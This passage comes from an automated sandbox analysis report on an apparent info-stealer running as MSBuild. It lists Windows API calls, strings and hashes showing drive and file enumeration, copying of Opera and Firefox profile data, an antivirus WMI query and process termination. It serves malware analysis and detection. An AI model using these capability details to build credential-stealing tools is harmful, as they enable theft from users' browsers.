                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004015F6
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004018F5
                                                                                          • Part of subcall function 00406C20: LocalFree.KERNEL32(?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CA9
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401967
                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004019A8
                                                                                        • FindClose.KERNEL32(00000000), ref: 004019B7
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2220404975-1173974218
                                                                                        • Opcode ID: b43918595e2391cb9db23ad8454a5d140223a2460fb525dc9aab70f32623a2f9
                                                                                        • Instruction ID: 1d754b9f1f181e8b004311f1424a94fcc02efae78f4dcff2990e7204b081244d
                                                                                        • Opcode Fuzzy Hash: b43918595e2391cb9db23ad8454a5d140223a2460fb525dc9aab70f32623a2f9
                                                                                        • Instruction Fuzzy Hash: FF3202729101186ADB28FBA1DC52EEE7378AF54304F54817EB506764D2EF386B4CCB68
                                                                                        Function 004156C0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137stringfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 004156DF
                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004156F6
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0041571C
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00415736
                                                                                        • lstrcatA.KERNEL32(?,0169A440,?,00000104,?,00000104), ref: 00415774
                                                                                        • lstrcatA.KERNEL32(?,0169A320), ref: 00415788
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0041579C
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004157AA
                                                                                        • lstrcatA.KERNEL32(?,004201E0), ref: 004157BC
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004157D0
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00415863
                                                                                        • FindClose.KERNEL32(00000000), ref: 00415872
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpywsprintf
                                                                                        • String ID: %s\%s
                                                                                        • API String ID: 1833283839-4073750446
                                                                                        • Opcode ID: e31d2834b5800846581c50843b59fcb23822e472b9e87247f18449742fc92fff
                                                                                        • Instruction ID: 0b78cd701ac643c87a03d62035dd32dfabddf56532c9e59c0612692b5200a2eb
                                                                                        • Opcode Fuzzy Hash: e31d2834b5800846581c50843b59fcb23822e472b9e87247f18449742fc92fff
                                                                                        • Instruction Fuzzy Hash: 9B41BAB2510218ABCB14FBB0DC85DEE337DAF84304F4485ADF605A2091EB749B88CFA5
                                                                                        Function 004153C0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 161stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0041541D
                                                                                        • memset.MSVCRT ref: 0041543E
                                                                                        • GetDriveTypeA.KERNEL32(00000000,?,?,00000000), ref: 00415447
                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,00000000), ref: 00415466
                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,00000000), ref: 00415484
                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 004154A7
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0041550E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                        • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$pVA
                                                                                        • API String ID: 1884655365-1202875852
                                                                                        • Opcode ID: 651858862d990c101e44fd5ff59ef2c2d412456b491b06cbe97d18b12f29a8ec
                                                                                        • Instruction ID: bbf7442ac75b1dedefd6e11ab23fcaa94ebd49349dc0b1136d9cad4923d5d44c
                                                                                        • Opcode Fuzzy Hash: 651858862d990c101e44fd5ff59ef2c2d412456b491b06cbe97d18b12f29a8ec
                                                                                        • Instruction Fuzzy Hash: 87516671600244ABDB70FF71DC86FEE3369AF44704F50803AFA0966192DF786A49CB69
                                                                                        Function 0040A2C0 Relevance: 19.8, APIs: 7, Strings: 4, Instructions: 512fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,004201E9,00000000,?,?), ref: 0040A322
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0040A34C
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 0040A366
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera,004201E9,004201E9,004201E9,004201E9,004201E9,004201E9,004201E9), ref: 0040A3DD
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A3F1
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A405
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D
                                                                                          • Part of subcall function 00409D40: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004201E9,?,75B0AC90,?), ref: 00409D8B
                                                                                          • Part of subcall function 00409D40: StrCmpCA.SHLWAPI(?,004201DC), ref: 00409DAE
                                                                                          • Part of subcall function 00409D40: StrCmpCA.SHLWAPI(?,004201D8), ref: 00409DC8
                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040A984
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                                                                        • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                        • API String ID: 3824151033-1710495004
                                                                                        • Opcode ID: 889923f85667ea30386d2ce6e40a168aeccca771022b4310aab7c130cc17b7e2
                                                                                        • Instruction ID: c055696588133eeff082df826d79585fe0f613ba782fed39e499d95d60d79d7b
                                                                                        • Opcode Fuzzy Hash: 889923f85667ea30386d2ce6e40a168aeccca771022b4310aab7c130cc17b7e2
                                                                                        • Instruction Fuzzy Hash: 5A1233729101086BCB28FB71DC52EED7378AF54704F40857EB506729D2EF786A4CCAA9
                                                                                        Function 00410900 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 141comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410928
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000), ref: 00410939
                                                                                        • CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?), ref: 00410953
                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?), ref: 0041098C
                                                                                        • VariantInit.OLEAUT32(?), ref: 004109E3
                                                                                          • Part of subcall function 00410CF0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A09,00000030,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000), ref: 00410CF8
                                                                                          • Part of subcall function 00410CF0: CharToOemW.USER32(?,00000000), ref: 00410D05
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • VariantClear.OLEAUT32(?), ref: 00410A1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                        • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                        • API String ID: 685420537-2561087649
                                                                                        • Opcode ID: 87aa53400a99d5c291a18064c614467eeea5bc9e82735329bb1475dada1603e8
                                                                                        • Instruction ID: 111392f2127a0d2122f17b414c1528a281c0ab609e0c548076d9d5dfd58a5577
                                                                                        • Opcode Fuzzy Hash: 87aa53400a99d5c291a18064c614467eeea5bc9e82735329bb1475dada1603e8
                                                                                        • Instruction Fuzzy Hash: A9415F71A01225ABCB20DB95DC45EEFBBBCEF49B60F10421AF515A7280C775AA41CBA4
                                                                                        Function 0040B390 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 283fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004234C0,004201E9,00000000,?,?), ref: 0040B3F2
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0040B41C
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 0040B436
                                                                                        • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,004201E0,?,?,004201E9), ref: 0040B4B0
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B562
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B59A
                                                                                        • DeleteFileA.KERNEL32(00000000,?,004201E9), ref: 0040B63E
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
                                                                                          • Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
                                                                                          • Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
                                                                                          • Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
                                                                                          • Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
                                                                                          • Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
                                                                                          • Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1
                                                                                        • FindNextFileA.KERNELBASE(00000000,?), ref: 0040B6F5
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B704
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Filelstrcpy$FindProcess$CloseCopyHeaplstrcat$AllocDeleteFirstHandleNextOpenSystemTerminateTimelstrlenmemsetwsprintf
                                                                                        • String ID: prefs.js
                                                                                        • API String ID: 874672723-3783873740
                                                                                        • Opcode ID: 5dccad2cdc090ff762bdfdcd86304b64a5550157acf92d62edbe24b0dda0dcf2
                                                                                        • Instruction ID: 4260c9570d047cb4ee5d2090f2cf981c79b292f60dd583d0dc47953d2b0846df
                                                                                        • Opcode Fuzzy Hash: 5dccad2cdc090ff762bdfdcd86304b64a5550157acf92d62edbe24b0dda0dcf2
                                                                                        • Instruction Fuzzy Hash: C2A11E72910108ABCB24FB71DC56AEE7778AF54304F40853EE905B35D2EF386A4DCA99
                                                                                        Function 004099F0 Relevance: 13.8, APIs: 9, Instructions: 251fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004234C0,004201E9,?), ref: 00409A50
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 00409A6D
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00409A87
                                                                                        • StrCmpCA.SHLWAPI(?,0169A518,00000000,?,?,?,004201E0,?,?,004201E9), ref: 00409B03
                                                                                        • StrCmpCA.SHLWAPI(?,01699D48), ref: 00409B69
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00408DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408E75
                                                                                          • Part of subcall function 00408DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408EAA
                                                                                        • FindNextFileA.KERNELBASE(00000000,?), ref: 00409CDF
                                                                                        • FindClose.KERNEL32(00000000), ref: 00409CEE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$File$Find$Copylstrcat$CloseFirstNextlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 1309316030-0
